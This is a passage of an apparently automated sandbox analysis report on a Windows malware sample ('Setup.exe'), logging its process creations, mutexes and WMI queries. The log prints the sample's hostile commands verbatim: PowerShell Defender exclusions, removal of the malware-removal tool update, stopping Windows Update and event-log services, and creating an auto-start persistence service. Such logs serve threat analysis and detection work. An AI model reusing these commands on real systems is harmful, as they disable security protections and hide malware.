          Source: C:\Windows\System32\dialer.exeCode function: 41_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,41_2_000000014000226C
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6916:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6840:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7008:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3976:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:544:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6776:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6736:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1768:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\llfrvfnuexbwtixr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3508:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6520:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5288:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xhp5dxa.c1z.ps1Jump to behavior
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select * from Win32_Process where name = "csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select * from Win32_Process where name = "csrss.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _Revision, _WorkId, Application, "Index", Category, Activation, HostId, Executable, Entrypoint, RuntimeType, StartPage, ResourceGroup, Flags, Subsystem, Parameters, _LouserzedDictionary, _Dictionary FROM ApplicationExtension WHERE _ApplicationExtensionID=? AND _WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _PackageLocationID, _Revision, _WorkId, Package, Volume, InstalledLocation, MutableLink, MutableLocation, _Dictionary FROM PackageLocation WHERE Package=? AND _WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT fta._FileTypeAssociationID, fta._Revision, fta._WorkId, fta.FileType, fta.ContentType, fta.Extension, fta."Index", fta.ProgID, fta._Dictionary FROM FileTypeAssociation AS fta INNER JOIN ApplicationExtension AS ae ON ae._ApplicationExtensionID=fta.Extension INNER JOIN Application AS a ON a._ApplicationID=ae.Application INNER JOIN PackageUser AS pu ON pu.Package=a.Package INNER JOIN User AS u ON u._UserID=pu.User WHERE fta.FileType=?2 AND u.UserSid=?1 AND fta._WorkId=0 AND ae._WorkId=0 AND a._WorkId=0 AND pu._WorkId=0 ;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT fta._FileTypeAssociationID, fta._Revision, fta._WorkId, fta.FileType, fta.ContentType, fta.Extension, fta."Index", fta.ProgID, fta._Dictionary FROM FileTypeAssociation AS fta INNER JOIN ApplicationExtension AS ae ON ae._ApplicationExtensionID=fta.Extension INNER JOIN Application AS a ON a._ApplicationID=ae.Application INNER JOIN PackageUser AS pu ON pu.Package=a.Package INNER JOIN User AS u ON u._UserID=pu.User WHERE fta.FileType=?2 AND u.UserSid=?1 AND fta._WorkId=0 AND ae._WorkId=0 AND a._WorkId=0 AND pu._WorkId=0 ;@
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _Revision, _WorkId, Application, "Index", Category, Activation, HostId, Executable, Entrypoint, RuntimeType, StartPage, ResourceGroup, Flags, Subsystem, Parameters, _LouserzedDictionary, _Dictionary FROM ApplicationExtension WHERE _ApplicationExtensionID=? AND _WorkId=0;0
          Source: svchost.exe, 0000006B.00000000.1587532438.00000184E1C50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT name FROM SQLITE_MASTER WHERE type='table' AND name NOT LIKE 'sqlite_%';
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT p._PackageID, p._Revision, p._WorkId, p.PackageFamily, p.ResourceId, p.Architecture, p.Version, p.PackageFullName, p.IsInbox, p.PackageType, p.Flags, p.Flags2, p.DisplayName, p.PublisherDisplayName, p.Description, p.Logo, p.OSMinVersion, p.OSMaxVersionTested, p.TargetDeviceFamily, p.Capabilities, p.SupportedUsers, p.SignatureOrigin, p.PackageOrigin, p.Enterprise, p.SourceBundle, p.EditionId, p.OSVersionWhenIndexed, p.InPlaceUpdateBaseline, p._Dictionary FROM Package AS p INNER JOIN PackageUser AS pu ON pu.Package=p._PackageID WHERE p.PackageFullName=?2 AND pu.User=?1 AND p._WorkId=0 AND pu._WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _UserID FROM User WHERE UserSid=?;
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeFile read: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "SXJAJUSN"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "SXJAJUSN"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAsJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "SXJAJUSN"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "SXJAJUSN"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
